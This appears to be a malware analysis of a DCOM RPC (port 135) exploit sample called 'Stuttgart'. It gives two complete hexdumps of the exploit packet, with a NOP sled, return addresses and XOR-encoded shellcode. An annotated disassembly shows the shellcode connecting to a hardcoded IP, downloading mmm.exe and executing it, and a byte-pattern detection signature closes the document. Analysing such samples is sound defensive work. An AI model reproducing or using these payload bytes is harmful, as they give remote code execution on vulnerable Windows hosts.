(DCOM)
Port: 135
Codename: Stuttgart
Reference: cdac1b24863204a32a63dc6222870933.bin
/*
00000000 05 00 00 03 10 00 00 00 8a 06 00 00 00 00 00 00 |................|
00000010 72 06 00 00 00 00 00 00 05 00 01 00 00 00 00 00 |r...............|
00000020 00 00 00 00 58 7d 75 75 40 eb c6 47 bc 71 4e a7 |....X}uu@..G.qN.|
00000030 1c d0 b5 97 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000040 00 00 00 00 00 00 00 00 00 00 09 00 00 03 00 00 |................|
00000050 00 00 00 00 00 03 00 00 5c 00 5c 00 90 90 90 90 |........\.\.....|
00000060 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |................|
00000070 90 90 90 90 90 90 90 90 90 90 90 90 eb 10 eb 19 |................|
00000080 9f 75 18 00 23 37 f3 77 eb e0 fd 7f 90 90 90 90 |.u..#7.w........|
00000090 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |................|
*
000000e0 90 90 90 90 eb 04 ff ff ff ff 90 90 90 90 90 90 |................|
000000f0 90 90 eb 04 eb 04 90 90 90 90 eb 04 ff ff ff ff |................|
00000100 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |................|
*
00000370 90 90 90 90 90 90 90 eb 15 b9 8b e6 13 41 81 f1 |.............A..|
00000380 d8 e7 13 41 5e 80 74 31 ff a2 e2 f9 eb 05 e8 e6 |...A^.t1........|
00000390 ff ff ff 91 79 c6 29 e1 92 29 e2 ae 29 d2 be 0f |....y.)..)..)...|
000003a0 29 e2 aa f1 f1 ca 91 90 a2 a2 ca d5 d1 90 fd ca |)...............|
000003b0 d0 d6 a2 a2 ca cf d1 d4 c1 4a 96 a2 a2 a2 a3 a2 |.........J......|
000003c0 a2 a2 97 c0 aa 74 d6 81 82 36 62 3b 6b 68 1b fe |.....t...6b;kh..|
000003d0 b7 cb 1b e2 54 e2 75 a0 11 af 27 5b ef 66 3e b8 |....T.u...'[.f>.|
000003e0 a6 ba 21 a3 71 b8 62 a0 b1 a5 22 96 a1 a5 16 28 |..!.q.b..."....(|
000003f0 9b 8a ff c8 a0 f9 29 5a f1 f1 29 f5 9e 29 f6 98 |......)Z..)..)..|
00000400 da a1 75 f0 29 f0 82 a1 75 91 79 e1 29 96 38 a1 |..u.)...u.y.).8.|
00000410 55 91 6b 0e 90 6a 63 63 a7 0e 26 62 d7 54 29 d7 |U.k..jcc..&b.T).|
00000420 a2 89 ee 17 a2 d7 46 25 96 86 29 f4 86 a1 75 c4 |......F%..)...u.|
00000430 29 ae f8 29 f4 be a1 75 29 a6 28 a1 65 fc 2b e6 |)..)...u).(.e.+.|
00000440 17 a2 5d e7 a2 f9 e9 d7 12 f9 21 61 a0 f6 5d f7 |..].......!a..].|
00000450 aa 21 66 aa 27 62 d7 3c 16 a0 89 42 28 66 f6 f2 |.!f.'b.<...B(f..|
00000460 5d f7 be f2 f2 ca f6 0f d6 49 ca a0 a2 88 37 29 |]........I....7)|
00000470 5e f2 c8 a3 c8 a0 5d f7 82 29 7a c8 b2 f5 f1 5d |^.....]..)z....]|
00000480 f7 86 27 62 d7 fb 65 e7 a2 a1 a2 a2 a2 f2 c8 a6 |..'b..e.........|
00000490 f7 f1 5d f7 8e 29 56 65 e7 a2 d5 c0 a2 a2 ca c7 |..]..)Ve........|
000004a0 da c7 a2 ca d8 d8 d8 8c 29 5e f7 f5 5d f7 ae 2b |........)^..]..+|
000004b0 e7 a2 c8 a2 ca a2 a0 a2 a2 f4 f1 5d f7 8a 27 62 |...........]..'b|
000004c0 d6 b3 da b9 5d d7 a2 f2 c8 a3 f4 5d f7 b2 21 66 |....]......]..!f|
000004d0 b2 49 7d 5d d7 a2 5d f7 b6 f2 f6 f5 5d f7 ba f1 |.I}]..].....]...|
000004e0 5d f7 92 5d f7 a6 62 62 62 62 62 62 62 62 62 62 |]..]..bbbbbbbbbb|
000004f0 62 62 62 62 62 62 62 62 62 62 62 62 62 62 62 62 |bbbbbbbbbbbbbbbb|
*
000005d0 62 62 8b 45 30 05 24 fb ff ff ff e0 eb f4 62 62 |bb.E0.$.......bb|
000005e0 0b 0b 1b 00 62 62 62 62 62 62 62 62 62 62 62 62 |....bbbbbbbbbbbb|
000005f0 62 62 62 62 62 62 62 62 62 62 62 62 62 62 62 62 |bbbbbbbbbbbbbbbb|
*
00000610 62 62 62 62 62 62 62 62 eb 06 62 62 59 1c 00 01 |bbbbbbbb..bbY...|
00000620 8b 44 24 fc 05 e0 fa ff ff ff e0 62 62 62 62 62 |.D$........bbbbb|
00000630 62 62 62 62 62 62 62 62 62 62 62 62 62 62 62 62 |bbbbbbbbbbbbbbbb|
00000640 62 62 62 62 62 62 62 62 62 62 62 62 62 62 5c 00 |bbbbbbbbbbbbbb\.|
00000650 41 00 00 00 00 00 00 00 00 00 00 00 02 00 00 00 |A...............|
00000660 00 00 00 00 01 00 00 00 68 1c 09 00 01 00 00 00 |........h.......|
00000670 00 00 00 00 00 00 00 00 c0 00 00 00 00 00 00 46 |...............F|
00000680 01 00 00 00 01 00 00 00 07 00 |..........|
0000068a
*//*
00000000 05 00 00 03 10 00 00 00 8a 06 00 00 00 00 00 00 |................|
00000010 72 06 00 00 00 00 00 00 05 00 01 00 00 00 00 00 |r...............|
00000020 00 00 00 00 58 7d 75 75 40 eb c6 47 bc 71 4e a7 |....X}uu@..G.qN.|
00000030 1c d0 b5 97 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000040 00 00 00 00 00 00 00 00 00 00 09 00 00 03 00 00 |................|
00000050 00 00 00 00 00 03 00 00 5c 00 5c 00 90 90 90 90 |........\.\.....|
00000060 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |................|
00000070 90 90 90 90 90 90 90 90 90 90 90 90 eb 10 eb 19 |................|
00000080 9f 75 18 00 23 37 f3 77 eb e0 fd 7f 90 90 90 90 |.u..#7.w........|
00000090 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |................|
*
000000e0 90 90 90 90 eb 04 ff ff ff ff 90 90 90 90 90 90 |................|
000000f0 90 90 eb 04 eb 04 90 90 90 90 eb 04 ff ff ff ff |................|
00000100 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |................|
*
00000370 90 90 90 90 90 90 90 eb 15 b9 8b e6 13 41 81 f1 |.............A..|
00000380 d8 e7 13 41 5e 80 74 31 ff a2 e2 f9 eb 05 e8 e6 |...A^.t1........|
00000390 ff ff ff 91 79 c6 29 e1 92 29 e2 ae 29 d2 be 0f |....y.)..)..)...|
000003a0 29 e2 aa f1 f1 ca 91 90 a2 a2 ca d5 d1 90 fd ca |)...............|
000003b0 d0 d6 a2 a2 ca cf d1 d4 c1 4a 96 a2 a2 a2 a3 a2 |.........J......|
000003c0 a2 a2 97 c0 aa 74 d6 81 82 36 62 3b 6b 68 1b fe |.....t...6b;kh..|
000003d0 b7 cb 1b e2 54 e2 75 a0 11 af 27 5b ef 66 3e b8 |....T.u...'[.f>.|
000003e0 a6 ba 21 a3 71 b8 62 a0 b1 a5 22 96 a1 a5 16 28 |..!.q.b..."....(|
000003f0 9b 8a ff c8 a0 f9 29 5a f1 f1 29 f5 9e 29 f6 98 |......)Z..)..)..|
00000400 da a1 75 f0 29 f0 82 a1 75 91 79 e1 29 96 38 a1 |..u.)...u.y.).8.|
00000410 55 91 6b 0e 90 6a 63 63 a7 0e 26 62 d7 54 29 d7 |U.k..jcc..&b.T).|
00000420 a2 89 ee 17 a2 d7 46 25 96 86 29 f4 86 a1 75 c4 |......F%..)...u.|
00000430 29 ae f8 29 f4 be a1 75 29 a6 28 a1 65 fc 2b e6 |)..)...u).(.e.+.|
00000440 17 a2 5d e7 a2 f9 e9 d7 12 f9 21 61 a0 f6 5d f7 |..].......!a..].|
00000450 aa 21 66 aa 27 62 d7 3c 16 a0 89 42 28 66 f6 f2 |.!f.'b.<...B(f..|
00000460 5d f7 be f2 f2 ca f6 0f 94 0b ca a0 a2 6d 59 29 |]............mY)|
00000470 5e f2 c8 a3 c8 a0 5d f7 82 29 7a c8 b2 f5 f1 5d |^.....]..)z....]|
00000480 f7 86 27 62 d7 fb 65 e7 a2 a4 a2 a2 a2 f2 c8 a6 |..'b..e.........|
00000490 f7 f1 5d f7 8e 29 56 65 e7 a2 d5 c0 a2 a2 ca c7 |..]..)Ve........|
000004a0 da c7 a2 ca cf cf cf 8c 29 5e f7 f5 5d f7 ae 2b |........)^..]..+|
000004b0 e7 a2 c8 a2 ca a2 a0 a2 a2 f4 f1 5d f7 8a 27 62 |...........]..'b|
000004c0 d6 b3 da b9 5d d7 a2 f2 c8 a3 f4 5d f7 b2 21 66 |....]......]..!f|
000004d0 b2 49 7d 5d d7 a2 5d f7 b6 f2 f6 f5 5d f7 ba f1 |.I}]..].....]...|
000004e0 5d f7 92 5d f7 a6 76 76 76 76 76 76 76 76 76 76 |]..]..vvvvvvvvvv|
000004f0 76 76 76 76 76 76 76 76 76 76 76 76 76 76 76 76 |vvvvvvvvvvvvvvvv|
*
000005d0 76 76 8b 45 30 05 24 fb ff ff ff e0 eb f4 76 76 |vv.E0.$.......vv|
000005e0 0b 0b 1b 00 76 76 76 76 76 76 76 76 76 76 76 76 |....vvvvvvvvvvvv|
000005f0 76 76 76 76 76 76 76 76 76 76 76 76 76 76 76 76 |vvvvvvvvvvvvvvvv|
*
00000610 76 76 76 76 76 76 76 76 eb 06 76 76 59 1c 00 01 |vvvvvvvv..vvY...|
00000620 8b 44 24 fc 05 e0 fa ff ff ff e0 76 76 76 76 76 |.D$........vvvvv|
00000630 76 76 76 76 76 76 76 76 76 76 76 76 76 76 76 76 |vvvvvvvvvvvvvvvv|
00000640 76 76 76 76 76 76 76 76 76 76 76 76 76 76 5c 00 |vvvvvvvvvvvvvv\.|
00000650 41 00 00 00 00 00 00 00 00 00 00 00 02 00 00 00 |A...............|
00000660 00 00 00 00 01 00 00 00 68 1c 09 00 01 00 00 00 |........h.......|
00000670 00 00 00 00 00 00 00 00 c0 00 00 00 00 00 00 46 |...............F|
00000680 01 00 00 00 01 00 00 00 07 00 |..........|
0000068a
*/
00402007 eb 15 jmp short stuttgar.0040201e 00402009 b9 8be61341 mov ecx,4113e68b 0040200e 81f1 d8e71341 xor ecx,4113e7d8 00402014 5e pop esi 00402015 807431 ff a2 xor byte ptr ds:[ecx+esi-1],0a2 0040201a ^e2 f9 loopd short stuttgar.00402015 0040201c eb 05 jmp short stuttgar.00402023 0040201e e8 e6ffffff call stuttgar.00402009 00402023 33db xor ebx,ebx 00402025 64:8b43 30 mov eax,dword ptr fs:[ebx+30] 00402029 8b40 0c mov eax,dword ptr ds:[eax+c] 0040202c 8b70 1c mov esi,dword ptr ds:[eax+1c] 0040202f ad lods dword ptr ds:[esi] 00402030 8b40 08 mov eax,dword ptr ds:[eax+8] 00402033 53 push ebx 00402034 53 push ebx 00402035 68 33320000 push 3233 0040203a 68 7773325f push 5f327377 0040203f 68 72740000 push 7472 00402044 68 6d737663 push 6376736d 00402049 e8 34000000 call stuttgar.00402082 0040204e d0b6 0378e275 sal byte ptr ds:[esi+75e27803],1 ; --------- no code below 00402054 e7 77 out 77,eax ; i/o command 00402056 54 push esp 00402057 a2 e777c21b mov byte ptr ds:[1bc277e7],al 0040205c 0278 9c add bh,byte ptr ds:[eax-64] 0040205f 40 inc eax 00402060 0278 b8 add bh,byte ptr ds:[eax-48] 00402063 0e push cs 00402064 0178 54 add dword ptr ds:[eax+54],edi 00402067 8c01 mov word ptr ds:[ecx],es 00402069 78 15 js short stuttgar.00402080 0040206b 3e:fa cli ; superfluous prefix 0040206d ^74 f4 je short stuttgar.00402063 0040206f 1e push ds 00402070 fa cli 00402071 74 53 je short stuttgar.004020c6 00402073 c4fa les edi,edx ; illegal use of register 00402075 ^74 ae je short stuttgar.00402025 00402077 a1 fa740fc1 mov eax,dword ptr ds:[c10f74fa] 0040207c fa cli 0040207d ^74 b6 je short stuttgar.00402035 0040207f 13fa adc edi,edx 00402081 74 5d je short stuttgar.004020e0 00402083 6a 02 push 2 00402085 5b pop ebx 00402086 8bf8 mov edi,eax 00402088 53 push ebx 00402089 53 push ebx 0040208a 8b57 3c mov edx,dword ptr ds:[edi+3c] 0040208d 8b543a 78 mov edx,dword ptr ds:[edx+edi+78] 00402091 03d7 add edx,edi 00402093 52 push edx 00402094 8b52 20 mov edx,dword ptr ds:[edx+20] 00402097 03d7 add edx,edi 00402099 33db xor ebx,ebx 0040209b 43 inc ebx 0040209c 8b349a mov esi,dword ptr ds:[edx+ebx*4] 0040209f 03f7 add esi,edi 004020a1 33c9 xor ecx,ecx 004020a3 ac lods byte ptr ds:[esi] 004020a4 32c8 xor cl,al 004020a6 c1c1 05 rol ecx,5 004020a9 ac lods byte ptr ds:[esi] 004020aa 84c0 test al,al 004020ac ^75 f6 jnz short stuttgar.004020a4 004020ae 8b75 00 mov esi,dword ptr ss:[ebp] 004020b1 2b4cb5 00 sub ecx,dword ptr ss:[ebp+esi*4] 004020b5 ^75 e4 jnz short stuttgar.0040209b 004020b7 873424 xchg dword ptr ss:[esp],esi 004020ba 8b56 24 mov edx,dword ptr ds:[esi+24] 004020bd 03d7 add edx,edi 004020bf 66:8b0c5a mov cx,word ptr ds:[edx+ebx*2] 004020c3 8b56 1c mov edx,dword ptr ds:[esi+1c] 004020c6 03d7 add edx,edi 004020c8 8b048a mov eax,dword ptr ds:[edx+ecx*4] 004020cb 03c7 add eax,edi 004020cd 5e pop esi 004020ce 8944b5 00 mov dword ptr ss:[ebp+esi*4],eax 004020d2 ff45 00 inc dword ptr ss:[ebp] 004020d5 5b pop ebx 004020d6 4b dec ebx 004020d7 ^75 b0 jnz short stuttgar.00402089 004020d9 5b pop ebx 004020da 83c3 02 add ebx,2 004020dd 54 push esp 004020de ff55 08 call dword ptr ss:[ebp+8] 004020e1 83c4 08 add esp,8 004020e4 85c0 test eax,eax 004020e6 ^75 9e jnz short stuttgar.00402086 004020e8 b4 02 mov ah,2 004020ea 2be0 sub esp,eax 004020ec 8ac4 mov al,ah 004020ee 54 push esp 004020ef 50 push eax 004020f0 ff55 1c call dword ptr ss:[ebp+1c] ; wsastartup 004020f3 50 push eax 004020f4 50 push eax 004020f5 68 54a654c2 push c254a654 ; ip 004020fa 68 0200c50d push 0dc50002 ; port 004020ff 8bfc mov edi,esp 00402101 50 push eax 00402102 6a 01 push 1 00402104 6a 02 push 2 00402106 ff55 20 call dword ptr ss:[ebp+20] ; socket 00402109 8bd8 mov ebx,eax 0040210b 6a 10 push 10 0040210d 57 push edi 0040210e 53 push ebx 0040210f ff55 24 call dword ptr ss:[ebp+24] ; connect 00402112 85c0 test eax,eax 00402114 75 59 jnz short stuttgar.0040216f 00402116 c745 00 03000000 mov dword ptr ss:[ebp],3 0040211d 50 push eax 0040211e 6a 04 push 4 00402120 55 push ebp 00402121 53 push ebx 00402122 ff55 2c call dword ptr ss:[ebp+2c] ; send 00402125 8bf4 mov esi,esp 00402127 c745 00 77620000 mov dword ptr ss:[ebp],6277 0040212e 68 65786500 push 657865 00402133 68 6d6d6d2e push 2e6d6d6d 00402138 8bfc mov edi,esp 0040213a 55 push ebp 0040213b 57 push edi 0040213c ff55 0c call dword ptr ss:[ebp+c] ; fopen // mmm.exe 0040213f 8945 00 mov dword ptr ss:[ebp],eax 00402142 6a 00 push 0 00402144 68 00020000 push 200 00402149 56 push esi 0040214a 53 push ebx 0040214b ff55 28 call dword ptr ss:[ebp+28] ; recv 0040214e 85c0 test eax,eax 00402150 74 11 je short stuttgar.00402163 00402152 78 1b js short stuttgar.0040216f 00402154 ff75 00 push dword ptr ss:[ebp] 00402157 50 push eax 00402158 6a 01 push 1 0040215a 56 push esi 0040215b ff55 10 call dword ptr ss:[ebp+10] ; fwrite 0040215e 83c4 10 add esp,10 00402161 ^eb df jmp short stuttgar.00402142 00402163 ff75 00 push dword ptr ss:[ebp] 00402166 ff55 14 call dword ptr ss:[ebp+14] ; fclose 00402169 50 push eax 0040216a 54 push esp 0040216b 57 push edi 0040216c ff55 18 call dword ptr ss:[ebp+18] ; _execv 0040216f 53 push ebx ; error/end 00402170 ff55 30 call dword ptr ss:[ebp+30] 00402173 ff55 04 call dword ptr ss:[ebp+4]
const char *stuttgart = "\\x50\\x50\\x68(....)\\x68\\x02\\x00" "(..)\\x8B\\xFC\\x50\\x6A\\x01\\x6A\\x02\\xFF" "\\x55\\x20\\x8B\\xD8\\x6A\\x10\\x57\\x53\\xFF\\x55" "\\x24\\x85\\xC0\\x75\\x59\\xC7\\x45\\x00(....)" "\\x50\\x6A\\x04\\x55\\x53\\xFF\\x55\\x2C";
